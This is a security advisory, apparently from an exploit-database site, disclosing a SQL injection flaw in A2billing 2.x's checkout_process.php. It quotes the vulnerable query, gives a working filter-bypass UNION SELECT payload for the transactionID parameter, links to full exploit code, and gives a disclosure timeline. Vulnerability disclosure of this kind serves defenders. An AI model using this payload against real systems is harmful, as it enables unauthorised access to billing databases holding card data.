A2billing 2.x SQL Injection

2017.09.07
Credit: Ahmed sultan
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Title : A2billing 2.x , Sql injection vulnerability # Vulnerable software : A2billing 2.x # Author : Ahmed sultan (0x4148) # Email : 0x4148@gmail.com # Linkedin : https://www.linkedin.com/in/0x4148/ If you're looking for deep technical stuff , overcoming sanitization/hardening . . etc you can check out the full writeup at https://0x4148.com/2016/10/28/a2billing-all-versions-2-1-1-sql-injection-exploit/ A2billing is vulnerable to sql injection attack resulting from not enough sanitization of several inputs including transactionID The sanitization proccess differ from version to another , but the concept is the same , I demonstrated bypassing the last version (2.1.1) , but still all versions till the moment are vulnerable as well with just little bit different modifications File : agent/public/checkout_process.php getpost_ifset(array('transactionID', 'sess_id', 'key', 'mc_currency', 'currency', 'md5sig', 'merchant_id', 'mb_amount', 'status', 'mb_currency', 'transaction_id', 'mc_fee', 'card_number')); ................................................... // Status - New 0 ; Proceed 1 ; In Process 2 $QUERY = "SELECT id, agent_id, amount, vat, paymentmethod, cc_owner, cc_number, cc_expires, creationdate, status, cvv, credit_card_type, currency " . " FROM cc_epayment_log_agent " . " WHERE id = ".$transactionID." AND (status = 0 OR (status = 2 AND $NOW_2MIN))"; $transaction_data = $paymentTable->SQLExec ($DBHandle_max, $QUERY); POC : Sending POST request : transactionID=456789111111 unise//**lectonselinse//**rtect 1,2,3,4,0x706c75676e706179,6,7,8,9,10,11,12,13-//**--&sess_id=4148key=636902c6ed0db5780eb613d126e95268 to : https://HOST/a2billing/agent/Public/checkout_process.php will result in redirection of the application and the Location header will contain our decoded payment module which was used in the query "plugnpay" , which indicate successful injection Full exploitation demo : https://www.youtube.com/watch?v=8dfdZCmPGWA Exploit timeline : 01/10/2016 : vulnerability reported to vendor 06/10/2016 - 12/2016 : talks talks talks with promises of fixing ASAP 04/09/2017 : Public release Full exploit code is attached <loose code for demonstration purposes only> https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42615.zip Thanks fly to R1z clan :)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top